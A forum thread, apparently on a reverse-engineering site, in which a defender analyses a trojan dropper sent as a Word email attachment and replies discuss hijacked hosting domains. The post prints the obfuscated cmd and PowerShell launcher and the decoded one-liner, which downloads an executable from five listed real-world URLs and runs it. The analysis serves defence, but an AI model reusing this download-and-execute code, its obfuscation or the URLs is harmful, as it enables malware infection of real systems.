Nestor10's Malware Analysis 101 - Anatomy of a Trojan Part 1/?

reverseengineering

#1

Hello all, Nestor10 here to share a couple things I’ve learned in my day job as an infosec samurai. If you want to know some vague things about me, you can check out my introduction.

So a few months ago, I noticed some emails coming in with really sketchy attachments - a few dozen had been delivered before I noticed, so I needed to quickly figure out what the attachments did!

DISCLAIMER

This breakdown uses a real trojan drop script from late last year. While I’m fairly sure none of the URLs in the script are still hosting any malicious code, you should proceed with the utmost caution. Do not attempt to actually run any portion of the code shown below. If you disregard this warning, you do so at your own risk, and I will not be helping you clean your system of whatever infection you end up with.

I dumped a sample in my trusty sandbox and got to work (you can use reverse.it or malwr.com to do the same). I get some interesting stuff back from dynamic analysis:

WINWORD.EXE /n "C:\Wire transfer info.doc" /o "u" (PID: 464)

cmd.exe "cmd /v /c "set %WPIWCBNzG%=RBnUjZTzm&&set %IPmmCqufN%=p^o^w^e^r^s&&set %PWKdRtDdJ%=mYnZmpJdh&&set %XZnNiozwI%=he^l^l&&set %ARXbYFCDI%=zwmAfmaLS&&!%IPmmCqufN%!!%XZnNiozwI%! ^-^e LgAoACgAVgBhAFIAaQBBAGIATABlACAAJwAqAG0AZAByACoAJwApAC4AbgBhAE0ARQBbADMALAAxADEALAAyAF0ALQBqAE8ASQBOACcAJwApACAAKAAiACAAJAAoAHMAZQBUAC0AaQB0AGUAbQAgACAAJw [lots of this removed for space] AAgAGYATwBSAEUAYQBDAEgAIAB7ACAAKABbAEkATgBUAF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAHIAXQApAH0AKQAgACsAIgAkACgAUwBlAHQALQB2AGEAUgBpAEEAYgBMAGUAIAAnAG8AZgBTACcAIAAgACcAIAAnACkAIgApACAA (PID: 1304) 

Well that’s obviously not doing anything good, but what is it doing? Further down the process tree we get something a little less obscure:

powershell.exe powershell -e [wall of base64 removed] (PID: 912, Additional Context:  .((VaRiAbLe '*mdr*').naME[3,11,2]-jOIN'') (" $(seT-item 'VARIable:OFS' '') " +[STrING]( (36, 119,115, 99,114, 105,112 ,116 ,32 , 61 , 32 ,110 ,101 ,119 ,45,111 , 98,106,101,99,116 , 32,45, 67 , 111 ,109 , 79,98, 106,101, 99 ,116 , 32 , 87 , 83 ,99, 114 ,105 , 112,116, 46 , 83 , 104,101 ,108, 108,59 , 36,119 ,101 ,98 ,99 ,108,105, 101, 110, 116 ,32,61 , 32 , 110 ,101 , 119 ,45,111 ,98, 106,101 , 99,116, 32 , 83,121,115,116, 101, 109,46 , 78, 101,116 , 46 , 87,101,98, 67, 108 , 105 , 101 , 110 ,116 ,59 ,36 , 114 ,97 ,110, 100 ,111 ,109 , 32,61,32, 110, 101,119 , 45 , 111, 98, 106,101, 99 , 116 , 32 ,114,97 , 110 , 100,111,109,59 ,36 ,117 , 114 , 108, 115 ,32 , 61 , 32 ,39,104, 116,116,112, 58 ,47,47 , 108 ,117, 110 ,122,101, 114, 46,100, 101,47 , 76,83 ,106 , 108 , 74,81 ,100, 47, 44 , 104,116 , 116 ,112, 58 ,47 ,47,97 ,117,114, 103,101 , 108, 109 , 105 , 114,46,100,101 ,47 ,66,114, 77,103 ,47,44, 104,116,116 ,112,58,47, 47,112 ,117,105,107, 112 , 114,111 ,100, 117,107, 116 , 105 ,101 ,115, 46, 110 , 108 , 47,82 ,77 , 97, 117 ,87 ,71, 103 , 69, 47 ,44, 104, 116, 116,112,58 ,47,47, 98 ,114,111,99, 107, 101 ,45 , 108 , 111, 101 ,104, 114, 46 , 100, 101 ,47 ,109, 107,70 ,82 ,70, 72,70, 47,44 , 104 , 116 , 116,112,58 ,47,47 ,98 , 106 ,104,46, 100, 101 ,47 , 115 ,85 ,107 , 117,47,39 ,46 , 83 ,112 , 108,105 ,116 , 40 , 39, 44,39,41 , 59 ,36 ,110 , 97, 109, 101, 32,61 , 32, 36 ,114 ,97 , 110,100, 111 , 109,46,110 ,101, 120 , 116 , 40,49 , 44 ,32 ,54, 53 ,53, 51, 54,41, 59,36,112, 97 ,116 , 104 , 32 , 61 ,32, 36,101, 110, 118 , 58 ,116,101 , 109 , 112, 32 , 43,32 , 39,92 , 39,32,43 ,32, 36, 110 ,97,109,101 ,32 , 43,32 , 39 ,46,101, 120,101 ,39, 59 , 102 , 111,114 ,101,97 , 99 , 104 ,40 ,36 , 117 , 114 , 108 ,32,105 ,110, 32,36 , 117,114, 108 , 115 , 41,123 , 116,114 , 121,123 ,36 , 119, 101 , 98 , 99,108 ,105 ,101 , 110,116 , 46 ,68,111 ,119, 110 , 108, 111,97 ,100,70,105,108 , 101, 40 , 36 ,117 ,114 ,108, 46, 84,111,83 ,116,114, 105, 110 , 103 , 40, 41,44 , 32 , 36,112 , 97 ,116,104 , 41 ,59, 83 ,116 ,97,114 ,116 ,45 ,80, 114 ,111, 99,101 , 115 ,115 , 32 ,36,112 ,97,116 ,104,59 ,98, 114 , 101 , 97, 107, 59, 125 ,99, 97,116, 99 ,104,123, 119 ,114 ,105,116 , 101 , 45,104 , 111 , 115 ,116 , 32 ,36,95 ,46,69, 120, 99 ,101,112,116,105 ,111, 110 , 46 ,77, 101 ,115 , 115 ,97 ,103,101 ,59, 125,125) | fOREaCH { ([INT] $_ -as[CHar])}) +"$(Set-vaRiAbLe 'ofS' ' ')");)
    35087.exe (PID: 1608)
        35087.exe (PID: 2368)

So it looks like we’ve called Powershell and then spawned some binaries from that… but we’re still no closer to understanding how to respond to this threat being on our network.

Looking at the code, we can tell that there are some strings being joined in weird ways, there’s some implicit evaluation going on with parentheses, and then we’ve got a whole tone of char codes, all being piped to foreach which is converting them to chars. So just like the original wall of base64 stuff that was run on cmd.exe, this should basically be creating a string to eval somehow.

Here’s where things get hairy - it’s not easy to figure out what string this will produce without eval()ing it ourselves. That means we have to figure out a way to remove its fangs before we proceed. Let’s take a look at the first bit of code:

.((VaRiAbLe '*mdr*').naME[3,11,2]-jOIN'')

Nothing too dangerous there. What happens if we run it?

cmdlet Invoke-Expression at command pipeline position 1

Aha! We found the claws, now we can just run the rest of the script. Here’s the secret it divulges to us:

$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://lunzer.de/LSjlJQd/,http://aurgelmir.de/BrMg/,http://puikprodukties.nl/RMauWGgE/,http://brocke-loehr.de/mkFRFHF/,http://bjh.de/sUku/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

When I ran the dynamic analysis, it gave me 1 IP to look into… but now that we’ve pulled apart the code, it’s clear that I need to be looking for any traffic to any URL in the $urls string there.

Thanks to our l33t [email protected] skilz, the affected users have been dismissed out the nearest airlock and we can block all the future traffic. Hurray!

Thanks for reading this cringe-worthy, sad excuse for a writeup. It’s my first time putting something like this together for a larger audience than the suits at work, so any feedback you might have will be appreciated immensely by myself. Same goes for any questions. :slight_smile:

Until next time,
Nestor0x0000000A


(Standard User) #2

This post was flagged by the community and is temporarily hidden.


(fxbg) #3

I remember when Trojans only affected Windows… oh wait, this one too, darn, thought we turned a corner!

Also, about the http://lunzer.de/ link, I wonder if the trojan author was stupid enough to use his personal website for this or if this domain is fronted/hijacked?


#4

Most likely hijacked - a vast majority of the things I end up temp blocking on my network are personal sites, blogs, etc. Lots of WordPress sites.

The file downloaded from that site would most likely be a stage 2 dropper that would then deliver the actual malware (sometimes from an actual C2).


#5

Not a bad write up at all. Can learn something from anything if you take the time to do so. Nice post


#6

Please don’t flag Suser - he posted this because I’d made a joke on the IRC channel. :slight_smile:


#7

suser was being suser. No worries @Nestor10 it was just flagged/hidden because it was no helpful for this thread and the potential discussions about it :wink: